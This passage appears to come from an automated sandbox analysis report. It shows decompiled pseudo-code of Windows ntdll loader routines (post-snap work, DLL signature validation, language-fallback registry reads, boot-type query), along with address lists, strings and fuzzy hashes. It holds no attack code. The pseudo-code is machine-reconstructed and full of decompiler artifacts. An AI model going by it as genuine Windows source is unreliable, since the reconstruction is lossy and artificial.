                                                              												E00FF8999(_t128,  &_v12);
                                                              												_t147 = _v12;
                                                              												_t91 = 0;
                                                              												__eflags = 0;
                                                              												_t129 =  *_t147;
                                                              												while(1) {
                                                              													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
                                                              													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
                                                              														break;
                                                              													}
                                                              													_t91 = _t91 + 1;
                                                              													__eflags = _t91 - 5;
                                                              													if(_t91 < 5) {
                                                              														continue;
                                                              													} else {
                                                              														_t131 = 0;
                                                              														__eflags = 0;
                                                              													}
                                                              													L37:
                                                              													__eflags = _t131;
                                                              													if(_t131 != 0) {
                                                              														goto L22;
                                                              													} else {
                                                              														__eflags = _v16 - _t147;
                                                              														if(_v16 != _t147) {
                                                              															goto L22;
                                                              														} else {
                                                              															E01002280(_t92, 0x10d86cc);
                                                              															_t94 = E010B9DFB( &_v20);
                                                              															__eflags = _t94 - 1;
                                                              															if(_t94 != 1) {
                                                              															}
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															 *_t118 =  *_t118 + 1;
                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                              															_t95 = E010161A0( &_v32);
                                                              															__eflags = _t95;
                                                              															if(_t95 != 0) {
                                                              																__eflags = _v32 | _v28;
                                                              																if((_v32 | _v28) != 0) {
                                                              																	_t71 = _t118 + 0x40; // 0x3f
                                                              																	_t134 = _t71;
                                                              																	goto L55;
                                                              																}
                                                              															}
                                                              															goto L30;
                                                              														}
                                                              													}
                                                              													goto L56;
                                                              												}
                                                              												_t92 = 0x10d5c64 + _t91 * 8;
                                                              												asm("lock xadd [eax], ecx");
                                                              												_t131 = (_t129 | 0xffffffff) - 1;
                                                              												goto L37;
                                                              											}
                                                              										}
                                                              										goto L56;
                                                              									} else {
                                                              										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                              										__eflags = _t143;
                                                              										if(_t143 != 0) {
                                                              											_t157 = _v12;
                                                              											_t103 = 0;
                                                              											__eflags = 0;
                                                              											_t136 =  &(_t157[1]);
                                                              											 *(_t161 + 0x64) = _t136;
                                                              											_t151 =  *_t157;
                                                              											_v20 = _t136;
                                                              											while(1) {
                                                              												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
                                                              												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
                                                              													break;
                                                              												}
                                                              												_t103 = _t103 + 1;
                                                              												__eflags = _t103 - 5;
                                                              												if(_t103 < 5) {
                                                              													continue;
                                                              												}
                                                              												L21:
                                                              												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
                                                              												__eflags = _t105;
                                                              												if(_t105 != 0) {
                                                              													__eflags =  *_t157 -  *_v16;
                                                              													if( *_t157 >=  *_v16) {
                                                              														goto L22;
                                                              													} else {
                                                              														asm("cdq");
                                                              														_t166 = _t157[5] & 0x0000ffff;
                                                              														_t108 = _t157[5] & 0x0000ffff;
                                                              														asm("cdq");
                                                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                              														if(__eflags > 0) {
                                                              															L29:
                                                              															E01002280(_t108, 0x10d86cc);
                                                              															 *_t118 =  *_t118 + 1;
                                                              															_t42 = _t118 + 0x40; // 0x3f
                                                              															_t156 = _t42;
                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															asm("movsd");
                                                              															_t110 = E010161A0( &_v32);
                                                              															__eflags = _t110;
                                                              															if(_t110 != 0) {
                                                              																__eflags = _v32 | _v28;
                                                              																if((_v32 | _v28) != 0) {
                                                              																	_t134 = _v20;
                                                              																	L55:
                                                              																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                              																}
                                                              															}
                                                              															L30:
                                                              															 *_t118 =  *_t118 + 1;
                                                              															asm("adc dword [ebx+0x4], 0x0");
                                                              															E00FFFFB0(_t118, _t156, 0x10d86cc);
                                                              															goto L22;
                                                              														} else {
                                                              															if(__eflags < 0) {
                                                              																goto L22;
                                                              															} else {
                                                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                              																	goto L22;
                                                              																} else {
                                                              																	goto L29;
                                                              																}
                                                              															}
                                                              														}
                                                              													}
                                                              													goto L56;
                                                              												}
                                                              												goto L22;
                                                              											}
                                                              											asm("lock inc dword [eax]");
                                                              											goto L21;
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						return _t143;
                                                              					}
                                                              				} else {
                                                              					_push( &_v8);
                                                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                              					_push(__ecx + 0x40);
                                                              					_push(_t121);
                                                              					_push(0xffffffff);
                                                              					_t80 = E01029A00();
                                                              					_t159 = _t80;
                                                              					if(_t159 < 0) {
                                                              						L8:
                                                              						return _t80;
                                                              					} else {
                                                              						goto L2;
                                                              					}
                                                              				}
                                                              				L56:
                                                              			}
                                                              0x00000000
                                                              0x00ff896a
                                                              0x00ff896b
                                                              0x00ff896e
                                                              0x00000000
                                                              0x00ff8970
                                                              0x00ff8970
                                                              0x00ff8970
                                                              0x00ff8970
                                                              0x00ff8972
                                                              0x00ff8972
                                                              0x00ff8974
                                                              0x00000000
                                                              0x00ff897a
                                                              0x00ff897a
                                                              0x00ff897d
                                                              0x00000000
                                                              0x00ff8983
                                                              0x01049c65
                                                              0x01049c6d
                                                              0x01049c72
                                                              0x01049c75
                                                              0x01049c75
                                                              0x01049c82
                                                              0x01049c86
                                                              0x01049c87
                                                              0x01049c88
                                                              0x01049c89
                                                              0x01049c8c
                                                              0x01049c90
                                                              0x01049c95
                                                              0x01049c97
                                                              0x01049ca0
                                                              0x01049ca3
                                                              0x01049ca9
                                                              0x01049ca9
                                                              0x00000000
                                                              0x01049ca9
                                                              0x01049ca3
                                                              0x00000000
                                                              0x01049c97
                                                              0x00ff897d
                                                              0x00000000
                                                              0x00ff8974
                                                              0x00ff8988
                                                              0x00ff8992
                                                              0x00ff8996
                                                              0x00000000
                                                              0x00ff8996
                                                              0x00ff894c
                                                              0x00000000
                                                              0x00ff8870
                                                              0x00ff887b
                                                              0x00ff887d
                                                              0x00ff887f
                                                              0x00ff8881
                                                              0x00ff8884
                                                              0x00ff8884
                                                              0x00ff8886
                                                              0x00ff8889
                                                              0x00ff888c
                                                              0x00ff888e
                                                              0x00ff8891
                                                              0x00ff8891
                                                              0x00ff8898
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff889a
                                                              0x00ff889b
                                                              0x00ff889e
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff88a0
                                                              0x00ff88a8
                                                              0x00ff88b0
                                                              0x00ff88b2
                                                              0x00ff88d3
                                                              0x00ff88d5
                                                              0x00000000
                                                              0x00ff88d7
                                                              0x00ff88db
                                                              0x00ff88dc
                                                              0x00ff88e0
                                                              0x00ff88e8
                                                              0x00ff88ee
                                                              0x00ff88f0
                                                              0x00ff88f3
                                                              0x00ff88fc
                                                              0x00ff8901
                                                              0x00ff8906
                                                              0x00ff890c
                                                              0x00ff890c
                                                              0x00ff890f
                                                              0x00ff8916
                                                              0x00ff8917
                                                              0x00ff8918
                                                              0x00ff8919
                                                              0x00ff891a
                                                              0x00ff891f
                                                              0x00ff8921
                                                              0x01049c52
                                                              0x01049c55
                                                              0x01049c5b
                                                              0x01049cac
                                                              0x01049cc0
                                                              0x01049cc0
                                                              0x01049c55
                                                              0x00ff8927
                                                              0x00ff8927
                                                              0x00ff892f
                                                              0x00ff8933
                                                              0x00000000
                                                              0x00ff88f5
                                                              0x00ff88f5
                                                              0x00000000
                                                              0x00ff88f7
                                                              0x00ff88f7
                                                              0x00ff88fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff88fa
                                                              0x00ff88f5
                                                              0x00ff88f3
                                                              0x00000000
                                                              0x00ff88d5
                                                              0x00000000
                                                              0x00ff88b2
                                                              0x00ff88c9
                                                              0x00000000
                                                              0x00ff88c9
                                                              0x00ff887f
                                                              0x00ff886a
                                                              0x00ff8857
                                                              0x00ff8852
                                                              0x00ff88bf
                                                              0x00ff88bf
                                                              0x00ff87aa
                                                              0x00ff87ad
                                                              0x00ff87ae
                                                              0x00ff87b4
                                                              0x00ff87b5
                                                              0x00ff87b6
                                                              0x00ff87b8
                                                              0x00ff87bd
                                                              0x00ff87c1
                                                              0x00ff87f4
                                                              0x00ff87fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ff87c1
                                                              0x00000000

                                                              Strings
                                                              • LdrpDoPostSnapWork, xrefs: 01049C1E
                                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01049C28
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 2994545307-1948996284
                                                              • Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                                                              • Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
                                                              • Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                                                              • Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				signed int _t73;
                                                              				void* _t77;
                                                              				char* _t82;
                                                              				char* _t87;
                                                              				signed char* _t97;
                                                              				signed char _t102;
                                                              				intOrPtr _t107;
                                                              				signed char* _t108;
                                                              				intOrPtr _t112;
                                                              				intOrPtr _t124;
                                                              				intOrPtr _t125;
                                                              				intOrPtr _t126;
                                                              
                                                              				_t107 = __edx;
                                                              				_v12 = __ecx;
                                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                              				_t124 = 0;
                                                              				_v20 = __edx;
                                                              				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                              					_t112 = _v8;
                                                              				} else {
                                                              					_t112 = 0;
                                                              					_v8 = 0;
                                                              				}
                                                              				if(_t112 != 0) {
                                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                              						_t124 = 0xc000007b;
                                                              						goto L8;
                                                              					}
                                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                              					 *(_t125 + 0x34) = _t73;
                                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                              					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                              					if(_t124 < 0) {
                                                              						goto L8;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                              						L8:
                                                              						return _t124;
                                                              					}
                                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t102 =  *0x10d5780; // 0x0
                                                              						if((_t102 & 0x00000003) != 0) {
                                                              							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                              							_t102 =  *0x10d5780; // 0x0
                                                              						}
                                                              						if((_t102 & 0x00000010) != 0) {
                                                              							asm("int3");
                                                              						}
                                                              						_t124 = 0xc0000428;
                                                              						goto L8;
                                                              					}
                                                              					L5:
                                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                              						goto L8;
                                                              					}
                                                              					_t77 = _a4 - 0x40000003;
                                                              					if(_t77 == 0 || _t77 == 0x33) {
                                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                              						if(E01007D50() != 0) {
                                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						} else {
                                                              							_t82 = 0x7ffe0384;
                                                              						}
                                                              						_t108 = 0x7ffe0385;
                                                              						if( *_t82 != 0) {
                                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E01007D50() == 0) {
                                                              									_t97 = 0x7ffe0385;
                                                              								} else {
                                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t97 & 0x00000020) != 0) {
                                                              									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              						}
                                                              						if(_a4 != 0x40000003) {
                                                              							L14:
                                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                              							if(E01007D50() != 0) {
                                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							} else {
                                                              								_t87 = 0x7ffe0384;
                                                              							}
                                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E01007D50() != 0) {
                                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t108 & 0x00000020) != 0) {
                                                              									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              							goto L8;
                                                              						} else {
                                                              							_v16 = _t125 + 0x24;
                                                              							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                              							if(_t124 < 0) {
                                                              								E00FEB1E1(_t124, 0x1490, 0, _v16);
                                                              								goto L8;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              			}




















                                                              0x00ff7eb1

                                                              Strings
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 010498A2
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
                                                              • LdrpCompleteMapModule, xrefs: 01049898
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                                                              • Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
                                                              • Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                                                              • Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00FEE620(void* __ecx, short* __edx, short* _a4) {
                                                              				char _v16;
                                                              				char _v20;
                                                              				intOrPtr _v24;
                                                              				char* _v28;
                                                              				char _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				intOrPtr _v52;
                                                              				void* _v56;
                                                              				void* _v60;
                                                              				char _v64;
                                                              				void* _v68;
                                                              				void* _v76;
                                                              				void* _v84;
                                                              				signed int _t59;
                                                              				signed int _t74;
                                                              				signed short* _t75;
                                                              				signed int _t76;
                                                              				signed short* _t78;
                                                              				signed int _t83;
                                                              				short* _t93;
                                                              				signed short* _t94;
                                                              				short* _t96;
                                                              				void* _t97;
                                                              				signed int _t99;
                                                              				void* _t101;
                                                              				void* _t102;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                              				_t96 = __edx;
                                                              				_v44 = __edx;
                                                              				_t78 = 0;
                                                              				_v56 = 0;
                                                              				if(__ecx == 0 || __edx == 0) {
                                                              					L28:
                                                              					_t97 = 0xc000000d;
                                                              				} else {
                                                              					_t93 = _a4;
                                                              					if(_t93 == 0) {
                                                              						goto L28;
                                                              					}
                                                              					_t78 = E00FEF358(__ecx, 0xac);
                                                              					if(_t78 == 0) {
                                                              						_t97 = 0xc0000017;
                                                              						L6:
                                                              						if(_v56 != 0) {
                                                              							_push(_v56);
                                                              							E010295D0();
                                                              						}
                                                              						if(_t78 != 0) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                              						}
                                                              						return _t97;
                                                              					}
                                                              					E0102FA60(_t78, 0, 0x158);
                                                              					_v48 = _v48 & 0x00000000;
                                                              					_t102 = _t101 + 0xc;
                                                              					 *_t96 = 0;
                                                              					 *_t93 = 0;
                                                              					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                              					_v36 = 0x18;
                                                              					_v28 =  &_v44;
                                                              					_v64 = 0;
                                                              					_push( &_v36);
                                                              					_push(0x20019);
                                                              					_v32 = 0;
                                                              					_push( &_v64);
                                                              					_v24 = 0x40;
                                                              					_v20 = 0;
                                                              					_v16 = 0;
                                                              					_t97 = E01029600();
                                                              					if(_t97 < 0) {
                                                              						goto L6;
                                                              					}
                                                              					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
                                                              					_push(0);
                                                              					_v48 = 4;
                                                              					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                              					if(_t97 >= 0) {
                                                              						if(_v52 != 1) {
                                                              							L17:
                                                              							_t97 = 0xc0000001;
                                                              							goto L6;
                                                              						}
                                                              						_t59 =  *_t78 & 0x0000ffff;
                                                              						_t94 = _t78;
                                                              						_t83 = _t59;
                                                              						if(_t59 == 0) {
                                                              							L19:
                                                              							if(_t83 == 0) {
                                                              								L23:
                                                              								E0102BB40(_t83, _t102 + 0x24, _t78);
                                                              								if(L00FF43C0( &_v48,  &_v64) == 0) {
                                                              									goto L17;
                                                              								}
                                                              								_t84 = _v48;
                                                              								 *_v48 = _v56;
                                                              								if( *_t94 != 0) {
                                                              									E0102BB40(_t84, _t102 + 0x24, _t94);
                                                              									if(L00FF43C0( &_v48,  &_v64) != 0) {
                                                              										 *_a4 = _v56;
                                                              									} else {
                                                              										_t97 = 0xc0000001;
                                                              										 *_v48 = 0;
                                                              									}
                                                              								}
                                                              								goto L6;
                                                              							}
                                                              							_t83 = _t83 & 0x0000ffff;
                                                              							while(_t83 == 0x20) {
                                                              								_t94 =  &(_t94[1]);
                                                              								_t74 =  *_t94 & 0x0000ffff;
                                                              								_t83 = _t74;
                                                              								if(_t74 != 0) {
                                                              									continue;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L23;
                                                              						} else {
                                                              							goto L14;
                                                              						}
                                                              						while(1) {
                                                              							L14:
                                                              							_t27 =  &(_t94[1]); // 0x2
                                                              							_t75 = _t27;
                                                              							if(_t83 == 0x2c) {
                                                              								break;
                                                              							}
                                                              							_t94 = _t75;
                                                              							_t76 =  *_t94 & 0x0000ffff;
                                                              							_t83 = _t76;
                                                              							if(_t76 != 0) {
                                                              								continue;
                                                              							}
                                                              							goto L23;
                                                              						}
                                                              						 *_t94 = 0;
                                                              						_t94 = _t75;
                                                              						_t83 =  *_t75 & 0x0000ffff;
                                                              						goto L19;
                                                              					}
                                                              				}
                                                              			}
































                                                              Strings
                                                              • InstallLanguageFallback, xrefs: 00FEE6DB
                                                              • @, xrefs: 00FEE6C0
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1757540487
                                                              • Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                                                              • Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
                                                              • Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                                                              • Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed short* _t63;
                                                              				signed int _t64;
                                                              				signed int _t65;
                                                              				signed int _t67;
                                                              				intOrPtr _t74;
                                                              				intOrPtr _t84;
                                                              				intOrPtr _t88;
                                                              				intOrPtr _t94;
                                                              				void* _t100;
                                                              				void* _t103;
                                                              				intOrPtr _t105;
                                                              				signed int _t106;
                                                              				short* _t108;
                                                              				signed int _t110;
                                                              				signed int _t113;
                                                              				signed int* _t115;
                                                              				signed short* _t117;
                                                              				void* _t118;
                                                              				void* _t119;
                                                              
                                                              				_push(0x80);
                                                              				_push(0x10c05f0);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                              				_t115 =  *(_t118 + 0xc);
                                                              				 *(_t118 - 0x7c) = _t115;
                                                              				 *((char*)(_t118 - 0x65)) = 0;
                                                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                              				_t113 = 0;
                                                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                              				_t100 = __ecx;
                                                              				if(_t100 == 0) {
                                                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                              					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              					 *((char*)(_t118 - 0x65)) = 1;
                                                              					_t63 =  *(_t118 - 0x90);
                                                              					_t101 = _t63[2];
                                                              					_t64 =  *_t63 & 0x0000ffff;
                                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                              					L20:
                                                              					_t65 = _t64 >> 1;
                                                              					L21:
                                                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                              					if(_t108 == 0) {
                                                              						L27:
                                                              						 *_t115 = _t65 + 1;
                                                              						_t67 = 0xc0000023;
                                                              						L28:
                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                              						L29:
                                                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                              						E010653CA(0);
                                                              						return E0103D130(0, _t113, _t115);
                                                              					}
                                                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                              							 *_t108 = 0;
                                                              						}
                                                              						goto L27;
                                                              					}
                                                              					 *_t115 = _t65;
                                                              					_t115 = _t65 + _t65;
                                                              					E0102F3E0(_t108, _t101, _t115);
                                                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                              					_t67 = 0;
                                                              					goto L28;
                                                              				}
                                                              				_t103 = _t100 - 1;
                                                              				if(_t103 == 0) {
                                                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                              					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
                                                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                              					_t101 = _t117[2];
                                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                              					if(_t74 < 0) {
                                                              						_t64 =  *_t117 & 0x0000ffff;
                                                              						_t115 =  *(_t118 - 0x7c);
                                                              						goto L20;
                                                              					}
                                                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                              					_t115 =  *(_t118 - 0x7c);
                                                              					goto L21;
                                                              				}
                                                              				if(_t103 == 1) {
                                                              					_t105 = 4;
                                                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                              					_push(_t118 - 0x70);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(_t105);
                                                              					_push(_t118 - 0x78);
                                                              					_push(0x6b);
                                                              					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
                                                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                              					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                              					if(_t113 != 0) {
                                                              						_push(_t118 - 0x70);
                                                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                              						_push(_t113);
                                                              						_push(4);
                                                              						_push(_t118 - 0x78);
                                                              						_push(0x6b);
                                                              						_t84 = E0102AA90();
                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                              						if(_t84 < 0) {
                                                              							goto L29;
                                                              						}
                                                              						_t110 = 0;
                                                              						_t106 = 0;
                                                              						while(1) {
                                                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                              							 *(_t118 - 0x88) = _t106;
                                                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                              								break;
                                                              							}
                                                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                              							_t106 = _t106 + 1;
                                                              						}
                                                              						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                              						_t119 = _t119 + 0x1c;
                                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                              						if(_t88 < 0) {
                                                              							goto L29;
                                                              						}
                                                              						_t101 = _t118 - 0x3c;
                                                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                              						goto L21;
                                                              					}
                                                              					_t67 = 0xc0000017;
                                                              					goto L28;
                                                              				}
                                                              				_push(0);
                                                              				_push(0x20);
                                                              				_push(_t118 - 0x60);
                                                              				_push(0x5a);
                                                              				_t94 = E01029860();
                                                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                              				if(_t94 < 0) {
                                                              					goto L29;
                                                              				}
                                                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                              					_t101 = L"Legacy";
                                                              					_push(6);
                                                              				} else {
                                                              					_t101 = L"UEFI";
                                                              					_push(4);
                                                              				}
                                                              				_pop(_t65);
                                                              				goto L21;
                                                              			}


                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                                                              • Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
                                                              • Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                                                              • Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E0100B944(signed int* __ecx, char __edx) {
                                                              				signed int _v8;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				signed int* _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v72;
                                                              				intOrPtr _v76;
                                                              				char _v77;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t65;
                                                              				intOrPtr _t67;
                                                              				intOrPtr _t68;
                                                              				char* _t73;
                                                              				intOrPtr _t77;
                                                              				intOrPtr _t78;
